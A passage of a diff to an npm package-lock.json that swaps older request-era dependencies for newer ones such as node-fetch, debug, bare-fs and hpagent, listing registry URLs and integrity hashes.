"https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.1.0.tgz", - "integrity": "sha512-7HSX4QQb4CspciLpVFwyRe79O3xsIZDDLER21kERQ71oaPodF8jL725AgJMFAYbooIqolJoRLuM81SpeUkpkvA==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-regex?sponsor=1" - } - }, - "node_modules/ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, "node_modules/argparse": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" }, - "node_modules/asn1": { - "version": "0.2.4", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.4.tgz", - "integrity": "sha512-jxwzQpLQjSmWXgwaCZE9Nz+glAG01yF1QnWgbhGwHI5A6FRIEY6IVqtHhIepHqI7/kyEyQEagBC5mBEFlIYvdg==", - "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", - "engines": { - "node": ">=0.8" - } - }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=", - "engines": { - "node": "*" - } - }, - "node_modules/aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" + "node_modules/b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==", + "license": "Apache-2.0" }, - "node_modules/axios": { - "version": "1.7.9", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.7.9.tgz", - "integrity": "sha512-LhLcE7Hbiryz8oMDdDptSrWowmB4Bl6RCt6sIJKpRB4XtVf0iEgewX3au/pJqm+Py1kCASkb/FFKjxQaLtxJvw==", - "dependencies": { - "follow-redirects": "^1.15.6", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" - } + "node_modules/bare-events": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", + "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", + "license": "Apache-2.0", + "optional": true }, - "node_modules/axios/node_modules/form-data": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", - "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", + "node_modules/bare-fs": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.5.tgz", + "integrity": "sha512-1zccWBMypln0jEE05LzZt+V/8y8AQsQQqxtklqaIyg5nu6OAYFhZxPXinJTSG+kU5qyNmeLgcn9AW7eHiCHVLA==", + "license": "Apache-2.0", + "optional": true, "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "mime-types": "^2.1.12" + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" }, "engines": { - "node": ">= 6" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "dependencies": { - "tweetnacl": "^0.14.3" - } - }, - "node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dependencies": { - "balanced-match": "^1.0.0" + "bare": ">=1.16.0" + }, + "peerDependencies": { + "bare-buffer": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + } } }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=", + "node_modules/bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", + "license": "Apache-2.0", + "optional": true, "engines": { - "node": ">=0.10.0" + "bare": ">=1.14.0" } }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" - }, - "node_modules/chownr": { + "node_modules/bare-path": { "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==", - "engines": { - "node": ">=18" + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", + "license": "Apache-2.0", + "optional": true, + "dependencies": { + "bare-os": "^3.0.1" } }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "node_modules/bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", + "license": "Apache-2.0", + "optional": true, "dependencies": { - "color-name": "~1.1.4" + "streamx": "^2.21.0" }, - "engines": { - "node": ">=7.0.0" + "peerDependencies": { + "bare-buffer": "*", + "bare-events": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + }, + "bare-events": { + "optional": true + } } }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", @@ -293,33 +250,21 @@ "node": ">= 0.8" } }, - "node_modules/core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" - }, - "node_modules/cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", + "node_modules/debug": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", + "integrity": "sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==", + "license": "MIT", "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" + "ms": "^2.1.3" }, "engines": { - "node": ">= 8" - } - }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", - "dependencies": { - "assert-plus": "^1.0.0" + "node": ">=6.0" }, - "engines": { - "node": ">=0.10" + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } } }, "node_modules/delayed-stream": { @@ -330,195 +275,67 @@ "node": ">=0.4.0" } }, - "node_modules/eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", + "node_modules/end-of-stream": { + "version": "1.4.4", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.4.tgz", + "integrity": "sha512-+uw1inIHVPQoaVuHzRyXd21icM+cnt4CzD5rW+NC1wjOUSTOs+Te7FOv7AhN7vS9x/oIyhLP5PR1H+phQAHu5Q==", + "license": "MIT", "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" + "once": "^1.4.0" } }, - "node_modules/emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" - }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "node_modules/extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=", - "engines": [ - "node >=0.6.0" - ] - }, "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" + "node_modules/fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==", + "license": "MIT" }, "node_modules/fast-uri": { "version": "3.0.3", "resolved": "https://registry.npmjs.org/fast-uri/-/fast-uri-3.0.3.tgz", "integrity": "sha512-aLrHthzCjH5He4Z2H9YZ+v6Ujb9ocRuW6ZzkJQOrTxleEijANq4v1TsaPaVG1PZcuurEzrLcWRyYBYXD5cEiaw==" }, - "node_modules/follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==", - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/RubenVerborgh" - } - ], - "engines": { - "node": ">=4.0" - }, - "peerDependenciesMeta": { - "debug": { - "optional": true - } - } - }, - "node_modules/foreground-child": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.0.tgz", - "integrity": "sha512-Ld2g8rrAyMYFXBhEqMz8ZAHBi4J4uS1i/CxGMDnjyFWddMXLVcDp051DZfu+t7+ab7Wv6SMqpWmyFIj5UbfFvg==", - "dependencies": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=", - "engines": { - "node": "*" - } - }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", - "dependencies": { - "assert-plus": "^1.0.0" - } - }, - "node_modules/glob": { - "version": "10.4.5", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", - "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", + "node_modules/form-data": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.1.tgz", + "integrity": "sha512-tzN8e4TX8+kkxGPK8D5u0FNmjPUjw3lwC9lSLxxoB/+GtsJG91CO8bSWy73APlgAZzZbXEYZJuxjkHH2w+Ezhw==", + "license": "MIT", "dependencies": { - "foreground-child": "^3.1.0", - "jackspeak": "^3.1.2", - "minimatch": "^9.0.4", - "minipass": "^7.1.2", - "package-json-from-dist": "^1.0.0", - "path-scurry": "^1.11.1" - }, - "bin": { - "glob": "dist/esm/bin.mjs" + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "mime-types": "^2.1.12" }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=", "engines": { - "node": ">=4" + "node": ">= 6" } }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", - "dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - }, + "node_modules/hpagent": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", + "license": "MIT", "engines": { - "node": ">=6" - } - }, - "node_modules/har-validator/node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" + "node": ">=14" } }, - "node_modules/har-validator/node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "node_modules/http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", + "node_modules/ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", + "license": "MIT", "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" }, "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "engines": { - "node": ">=8" + "node": ">= 12" } }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" - }, "node_modules/isomorphic-ws": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", @@ -527,30 +344,10 @@ "ws": "*" } }, - "node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" - }, - "node_modules/jackspeak": { - "version": "3.4.3", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", - "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", - "dependencies": { - "@isaacs/cliui": "^8.0.2" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - }, - "optionalDependencies": { - "@pkgjs/parseargs": "^0.11.0" - } - }, "node_modules/jose": { "version": "5.9.6", "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true, "funding": { "url": "https://github.com/sponsors/panva" } @@ -567,37 +364,30 @@ } }, "node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "license": "MIT" }, "node_modules/jsep": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", + "license": "MIT", "engines": { "node": ">= 10.16.0" } }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, "node_modules/json-schema-traverse": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==" }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" - }, "node_modules/jsonpath-plus": { - "version": "10.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.2.0.tgz", - "integrity": "sha512-T9V+8iNYKFL2n2rF+w02LBOT2JjDnTjioaNFrxRy0Bv1y/hNsqR/EBK7Ojy2ythRHwmz2cRIls+9JitQGZC/sw==", + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", + "license": "MIT", "dependencies": { "@jsep-plugin/assignment": "^1.3.0", "@jsep-plugin/regex": "^1.0.4", @@ -619,25 +409,6 @@ "node": ">=0.10.0" } }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - }, - "engines": { - "node": ">=0.6.0" - } - }, - "node_modules/lru-cache": { - "version": "10.4.3", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", - "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==" - }, "node_modules/mime-db": { "version": "1.49.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", @@ -657,569 +428,222 @@ "node": ">= 0.6" } }, - "node_modules/minimatch": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", - "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", - "dependencies": { - "brace-expansion": "^2.0.1" - }, - "engines": { - "node": ">=16 || 14 >=14.17" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==", - "engines": { - "node": ">=16 || 14 >=14.17" - } + "node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "license": "MIT" }, - "node_modules/minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", + "node_modules/node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "license": "MIT", "dependencies": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" + "whatwg-url": "^5.0.0" }, "engines": { - "node": ">= 18" - } - }, - "node_modules/mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==", - "bin": { - "mkdirp": "dist/cjs/src/bin.js" + "node": "4.x || >=6.0.0" }, - "engines": { - "node": ">=10" + "peerDependencies": { + "encoding": "^0.1.0" }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "engines": { - "node": "*" + "peerDependenciesMeta": { + "encoding": { + "optional": true + } } }, "node_modules/oauth4webapi": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", - "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/openid-client": { - "version": "6.1.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", - "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, - "dependencies": { - "jose": "^5.9.6", - "oauth4webapi": "^3.1.1" - }, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/package-json-from-dist": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", - "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==" - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "engines": { - "node": ">=8" - } - }, - "node_modules/path-scurry": { - "version": "1.11.1", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", - "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", - "dependencies": { - "lru-cache": "^10.2.0", 